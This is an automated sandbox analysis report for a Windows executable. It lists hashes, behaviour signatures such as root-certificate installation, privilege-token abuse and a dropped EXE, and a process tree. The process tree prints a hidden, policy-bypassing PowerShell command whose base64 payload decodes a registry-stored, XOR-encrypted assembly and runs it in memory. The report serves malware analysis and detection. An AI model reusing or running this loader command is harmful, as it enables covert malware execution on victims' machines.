08c96573ef49ec027f0f9e466e85619d6324c5b62eabfc1f26c0d4ac2d571486

General

Target

cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Size

276.0MB
MD5

8a5a192bd90e11d69411b772e683121b
SHA1

aa2028f90a3cd0cf04a2ead9a5ec6ff03f95e8e2
SHA256

cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2
SHA512

81ec27bc03567466dc1cdfac7ceb7e9f34ee0cbe1bcc4d933009c7237cb3ad027d2bdfc88fcd39e62caa4e480b05254cc5da2c4b9861fc9c3e87f67ed3b0c387

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

33 3952 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

Bkmdqqkch.exe

pid process

4796 Bkmdqqkch.exe

flow	pid	process
33	3952	powershell.exe

pid	process
4796	Bkmdqqkch.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exepowershell.exe

pid process

5088 cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
3952 powershell.exe
3952 powershell.exe

pid	process
5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
3952	powershell.exe
3952	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe

description	pid	process
Token: SeDebugPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeIncreaseQuotaPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSecurityPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeTakeOwnershipPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeLoadDriverPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSystemProfilePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSystemtimePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeProfSingleProcessPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeIncBasePriorityPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeCreatePagefilePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeBackupPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeRestorePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeShutdownPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeDebugPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSystemEnvironmentPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeRemoteShutdownPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeUndockPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeManageVolumePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 33	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 34	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 35	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 36	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeIncreaseQuotaPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSecurityPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeTakeOwnershipPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeLoadDriverPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSystemProfilePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSystemtimePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeProfSingleProcessPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeIncBasePriorityPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeCreatePagefilePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeBackupPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeRestorePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeShutdownPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeDebugPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSystemEnvironmentPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeRemoteShutdownPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeUndockPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeManageVolumePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 33	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 34	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 35	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 36	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeIncreaseQuotaPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSecurityPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeTakeOwnershipPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeLoadDriverPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSystemProfilePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSystemtimePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeProfSingleProcessPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeIncBasePriorityPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeCreatePagefilePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeBackupPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeRestorePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeShutdownPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeDebugPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeSystemEnvironmentPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeRemoteShutdownPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeUndockPrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: SeManageVolumePrivilege	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 33	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 34	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 35	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
Token: 36	5088	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.execmd.exe

description	pid	process	target process
PID 3316 wrote to memory of 4796	3316	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe	Bkmdqqkch.exe
PID 3316 wrote to memory of 4796	3316	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe	Bkmdqqkch.exe
PID 3316 wrote to memory of 4796	3316	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe	Bkmdqqkch.exe
PID 3316 wrote to memory of 5088	3316	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
PID 3316 wrote to memory of 5088	3316	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe	cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
PID 240 wrote to memory of 3952	240	cmd.exe	powershell.exe
PID 240 wrote to memory of 3952	240	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
"C:\Users\Admin\AppData\Local\Temp\cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3316

C:\Users\Admin\AppData\Local\Temp\Bkmdqqkch.exe
"C:\Users\Admin\AppData\Local\Temp\Bkmdqqkch.exe"
2⤵
- Executes dropped EXE
PID:4796

C:\Users\Admin\AppData\Local\Temp\cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe
"C:\Users\Admin\AppData\Local\Temp\cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe" /s
2⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\system32\cmd.exe
cmd.exe /c start /min "" powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand DQAKACQASABxAG0AdwBzAHIAdQA9AEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACAALQBOAGEAbQBlACAAVABXAEoAWQBYAE8AVQBMAEEAZABtAGkAbgA7AA0ACgAkAFoAagBsAGsAcABlAFYAPQAiADAAMQAwADAAMAAwADAAMABkADAAOABjADkAZABkAGYAMAAxADEANQBkADEAMQAxADgAYwA3AGEAMAAwAGMAMAA0AGYAYwAyADkANwBlAGIAMAAxADAAMAAwADAAMAAwADkAYwBhADYANwBhAGEAZAA2ADkANwAzAGMAMQA0ADcAYQAxADQAZQA0ADIANQA3ADkANwA5AGIAMAA5ADEANQAwADAAMAAwADAAMAAwADAAMAAyADAAMAAwADAAMAAwADAAMAAwADAAMQAwADYANgAwADAAMAAwADAAMAAwADEAMAAwADAAMAAyADAAMAAwADAAMAAwADAAZgA0AGQANABhAGYAZAA5AGQAMAAxADcANQAwAGMAZgAyAGIAYgAyADMAMgBiADAANQA5ADAAYQAyAGUANAA5ADYAMgBhADQANQA2ADUAZAA5ADkAMQAxAGEAZgA4ADUAMgBhAGIAYwBlADEAYwAzAGQAMAA2AGUAZAAxADEAOAAwADAAMAAwADAAMAAwADAAMABlADgAMAAwADAAMAAwADAAMAAwADIAMAAwADAAMAAyADAAMAAwADAAMAAwADAANgAwAGQANQBjADUANAA2AGQAZABhADMAYgBlAGUAMwAwAGUAMQA1ADcANAA5AGYANwBhADIANAA1AGQANwBlADYAOQAzAGIAOQA2AGYAYgBlADkAMwAwAGQAYQBiADEAMQA3ADYAYQAwAGUAZAA5ADAAOQAxADQANQAxADEANwBhADAAMAAwADAAMAAwADAAZABiADAAYwBkADcAZQBmADMANQA3ADUAMwA3AGQANgA4ADkAYwA0ADQAOQA2ADgAZQA5AGYAMwBiAGMAOQBmADMAZQBjADUAMgA1AGEAZAAxADUAMQBlAGIANQA5ADUANQBiAGMAZABjAGEAYQA5AGEAYQA4ADkAZAA2ADMAZQAwAGEANAA3ADgANgA3AGQAMQA0ADgAZgA3ADUAMQAzADUAOQBhADMAMwBjADcAYwA1AGMAZAA0AGEAMAA2AGMAOAA5AGUANgAyADkAOQA1ADIAOQA3ADMANwBkADUAYQBlADEAMwAzAGMAYwBiADAAMwBmAGMAZQA0ADMANQA1AGMAOQBlADMAOQAwADIAZABhADMAMAAzAGEAYwA2AGMANgA5ADcAMwBlAGUAOQBjADkAZgAwADIAOABiADAAMAAyADUAZQA2AGIAOAA2ADYAYwA0AGYAYgA0AGQANwBkADMAMwAyADEANgBkADIAMQA4AGQAZQBhADEANgAyADEAMwAzAGQAMgAwADcAZAA1AGIAMAA5ADcAOQAzADAAZQBjAGQAMABjADIAMwBjADYAYQAwADUAYQA3AGEAZQBmAGYAMgA3AGQAMgAzAGIAYwBlADkANQAwADYANAA5ADcANQAyADgAMAA1ADUANwA4ADYAYQBjADkAOQAyAGUAYwA0ADUAMgAzAGUAZgAxADMANQBiADgAYwA3ADcANwAwADIAOAA2ADYAZgAxAGQANQBiADEAZQBhADkAZgBmAGIANgBlAGMAZgBhADUANQBhADIAMwBkAGIANQA5AGMAYgA4AGIAYgA3ADgAMAA0ADUAMgAxADIANgA0AGYAMQA2ADQAMAAwADAAMAAwADAAMAA1ADEANgBiADEAMwAyAGIAZABmADIAMwAxADkAZgAwADkANQA0ADUANABjADMAYgAwADAAMgBlAGUAYgAxADUAZABjADgANQBjAGMAYQA4ADgANwA0ADQANwA1ADIAZAA2ADYAYwA2AGEAMQA4ADcANAA5ADcAMwBmADkAZAAxAGMAOQA2ADcAZgBiADkAZQAyAGQAMQA5AGQAOAA3ADMAMgA5AGYANQBiADQAYQA0AGMAYgA3ADMAOQA2ADcANAAxADYAYgA2ADYAZQAwADMAZAAzADcAZgA4ADgANgA2ADMAOAA0AGQAYQAyAGEAZQA3ADkANAA2ADMAZQBiADEAIgB8AEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAOwANAAoAJABNAGwATwBwAG4AZABxAD0AWwBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AFAAdAByAFQAbwBTAHQAcgBpAG4AZwBCAFMAVABSACgAWwBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnAFQAbwBCAFMAVABSACgAJABaAGoAbABrAHAAZQBWACkAKQA7AA0ACgBmAG8AcgAoACQASgBWAHQAaAB5AHIAPQAwADsAJABKAFYAdABoAHkAcgAgAC0AbAB0ACAAJABIAHEAbQB3AHMAcgB1AC4AQwBvAHUAbgB0ADsAJABKAFYAdABoAHkAcgArACsAKQAgAHsAJABIAHEAbQB3AHMAcgB1AFsAJABKAFYAdABoAHkAcgBdACAAPQAgACQASABxAG0AdwBzAHIAdQBbACQASgBWAHQAaAB5AHIAXQAgAC0AYgB4AG8AcgAgACQATQBsAE8AcABuAGQAcQBbACQASgBWAHQAaAB5AHIAIAAlACAAJABNAGwATwBwAG4AZABxAC4ATABlAG4AZwB0AGgAXQB9ADsADQAKACQAVQB1AHYAcAB3AGMAdwB6AGgAagB6AGwAbwB5AGIAPQBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQASABxAG0AdwBzAHIAdQApADsADQAKACQATABiAGEAZgB0AG0AZgBoAHoASgBtAHAAegB6AGQAYwBsAGIAZQBlAGkAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwAuAEwAaQBzAHQAWwBTAHkAcwB0AGUAbQAuAFMAdAByAGkAbgBnAFsAXQBdAF0AOgA6AG4AZQB3ACgAKQA7AA0ACgAkAEwAYgBhAGYAdABtAGYAaAB6AEoAbQBwAHoAegBkAGMAbABiAGUAZQBpAC4AQQBkAGQAKAAiADYANwBFADIANgAxADMAMAAzADQAQQBCAEMAMABCAEYANQA3ADQANgBBAEYANgBEADcANwAzADYARQA1AEEAQQAiACkAOwANAAoAJABVAHUAdgBwAHcAYwB3AHoAaABqAHoAbABvAHkAYgAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQARwBsAGIARAB3AHAAYQB4AGsAbgB0AGoALAAgACQATABiAGEAZgB0AG0AZgBoAHoASgBtAHAAegB6AGQAYwBsAGIAZQBlAGkAKQA7AA0ACgAJAA==
1⤵
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand DQAKACQASABxAG0AdwBzAHIAdQA9AEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACAALQBOAGEAbQBlACAAVABXAEoAWQBYAE8AVQBMAEEAZABtAGkAbgA7AA0ACgAkAFoAagBsAGsAcABlAFYAPQAiADAAMQAwADAAMAAwADAAMABkADAAOABjADkAZABkAGYAMAAxADEANQBkADEAMQAxADgAYwA3AGEAMAAwAGMAMAA0AGYAYwAyADkANwBlAGIAMAAxADAAMAAwADAAMAAwADkAYwBhADYANwBhAGEAZAA2ADkANwAzAGMAMQA0ADcAYQAxADQAZQA0ADIANQA3ADkANwA5AGIAMAA5ADEANQAwADAAMAAwADAAMAAwADAAMAAyADAAMAAwADAAMAAwADAAMAAwADAAMQAwADYANgAwADAAMAAwADAAMAAwADEAMAAwADAAMAAyADAAMAAwADAAMAAwADAAZgA0AGQANABhAGYAZAA5AGQAMAAxADcANQAwAGMAZgAyAGIAYgAyADMAMgBiADAANQA5ADAAYQAyAGUANAA5ADYAMgBhADQANQA2ADUAZAA5ADkAMQAxAGEAZgA4ADUAMgBhAGIAYwBlADEAYwAzAGQAMAA2AGUAZAAxADEAOAAwADAAMAAwADAAMAAwADAAMABlADgAMAAwADAAMAAwADAAMAAwADIAMAAwADAAMAAyADAAMAAwADAAMAAwADAANgAwAGQANQBjADUANAA2AGQAZABhADMAYgBlAGUAMwAwAGUAMQA1ADcANAA5AGYANwBhADIANAA1AGQANwBlADYAOQAzAGIAOQA2AGYAYgBlADkAMwAwAGQAYQBiADEAMQA3ADYAYQAwAGUAZAA5ADAAOQAxADQANQAxADEANwBhADAAMAAwADAAMAAwADAAZABiADAAYwBkADcAZQBmADMANQA3ADUAMwA3AGQANgA4ADkAYwA0ADQAOQA2ADgAZQA5AGYAMwBiAGMAOQBmADMAZQBjADUAMgA1AGEAZAAxADUAMQBlAGIANQA5ADUANQBiAGMAZABjAGEAYQA5AGEAYQA4ADkAZAA2ADMAZQAwAGEANAA3ADgANgA3AGQAMQA0ADgAZgA3ADUAMQAzADUAOQBhADMAMwBjADcAYwA1AGMAZAA0AGEAMAA2AGMAOAA5AGUANgAyADkAOQA1ADIAOQA3ADMANwBkADUAYQBlADEAMwAzAGMAYwBiADAAMwBmAGMAZQA0ADMANQA1AGMAOQBlADMAOQAwADIAZABhADMAMAAzAGEAYwA2AGMANgA5ADcAMwBlAGUAOQBjADkAZgAwADIAOABiADAAMAAyADUAZQA2AGIAOAA2ADYAYwA0AGYAYgA0AGQANwBkADMAMwAyADEANgBkADIAMQA4AGQAZQBhADEANgAyADEAMwAzAGQAMgAwADcAZAA1AGIAMAA5ADcAOQAzADAAZQBjAGQAMABjADIAMwBjADYAYQAwADUAYQA3AGEAZQBmAGYAMgA3AGQAMgAzAGIAYwBlADkANQAwADYANAA5ADcANQAyADgAMAA1ADUANwA4ADYAYQBjADkAOQAyAGUAYwA0ADUAMgAzAGUAZgAxADMANQBiADgAYwA3ADcANwAwADIAOAA2ADYAZgAxAGQANQBiADEAZQBhADkAZgBmAGIANgBlAGMAZgBhADUANQBhADIAMwBkAGIANQA5AGMAYgA4AGIAYgA3ADgAMAA0ADUAMgAxADIANgA0AGYAMQA2ADQAMAAwADAAMAAwADAAMAA1ADEANgBiADEAMwAyAGIAZABmADIAMwAxADkAZgAwADkANQA0ADUANABjADMAYgAwADAAMgBlAGUAYgAxADUAZABjADgANQBjAGMAYQA4ADgANwA0ADQANwA1ADIAZAA2ADYAYwA2AGEAMQA4ADcANAA5ADcAMwBmADkAZAAxAGMAOQA2ADcAZgBiADkAZQAyAGQAMQA5AGQAOAA3ADMAMgA5AGYANQBiADQAYQA0AGMAYgA3ADMAOQA2ADcANAAxADYAYgA2ADYAZQAwADMAZAAzADcAZgA4ADgANgA2ADMAOAA0AGQAYQAyAGEAZQA3ADkANAA2ADMAZQBiADEAIgB8AEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAOwA